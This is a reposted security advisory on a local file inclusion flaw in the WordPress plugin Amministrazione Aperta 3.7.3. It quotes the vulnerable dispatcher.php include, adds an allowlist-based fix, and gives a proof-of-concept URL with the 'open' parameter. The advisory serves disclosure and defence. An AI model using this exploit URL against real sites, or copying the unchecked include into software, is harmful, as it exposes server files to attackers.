
WordPress Amministrazione Aperta 3.7.3 arbitrary file reading

2022-04-21 12:06:00 Khan security team

# Vendor homepage: https://wordpress.org/plugins/amministrazione-aperta/

# Version: 3.7.3

# Tested with: Firefox

# Vulnerable file: dispatcher.php

# Vulnerable code:

```php
if ( isset($_GET['open']) ) {
    // The user-controlled "open" parameter is concatenated into the include
    // path unchanged: no allowlist, no basename()/realpath() check, so
    // traversal sequences and absolute paths reach include() as-is. This is
    // the arbitrary file read (local file inclusion) described in this advisory.
    include(ABSPATH . 'wp-content/plugins/'.$_GET['open']);
} else {
    echo '
        <div id="welcome-panel" class="welcome-panel"
style="padding-bottom: 20px;">
                <div class="welcome-panel-column-container">';

    include_once( ABSPATH . WPINC . '/feed.php' );
    // ... remainder of the else branch omitted in this excerpt
}
```
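A hardened replacement for the include() above, added here as an illustration and not taken from the plugin; the allowlisted view names and the helper name amm_resolve_view are assumptions, while ABSPATH and wp_die() are standard WordPress:

```php
<?php
// Added example (not the plugin's own code): fail-closed dispatcher that only
// includes files it was written to serve. Assumes ABSPATH is defined by
// WordPress and that the legitimate targets are a fixed set of view files.

// Allowlist of views dispatcher.php may include (hypothetical names).
const AMM_ALLOWED_VIEWS = array('wpgov/views/home.php', 'wpgov/views/list.php');

function amm_resolve_view($open) {
    // Reject anything not explicitly allowed before touching the filesystem;
    // the strict in_array() also rejects arrays and type-juggled values.
    if (!is_string($open) || !in_array($open, AMM_ALLOWED_VIEWS, true)) {
        return null;
    }
    $base = realpath(ABSPATH . 'wp-content/plugins/amministrazione-aperta');
    $path = realpath($base . '/' . $open);
    // realpath() collapses ../ and symlinks; the prefix check guarantees the
    // resolved file still lives inside the plugin directory.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

if (isset($_GET['open'])) {
    $view = amm_resolve_view($_GET['open']);
    if ($view === null) {
        // Unknown or out-of-tree request: refuse it and leave a log trail
        // so traversal attempts against this endpoint become visible.
        error_log('amministrazione-aperta: rejected open=' . (string) $_GET['open']);
        wp_die('Invalid request.', '', array('response' => 400));
    }
    include $view;
}
```

The rejected-request log line is also the signal to alert on: any dispatcher.php request whose open value is not in the allowlist indicates probing of this endpoint.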

# Proof of concept:

localhost/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=[LFI]

Copyright notice
This article was written by [Khan security team]; please include the original link when reposting. Thank you.
https://yzsam.com/2022/04/202204211201158333.html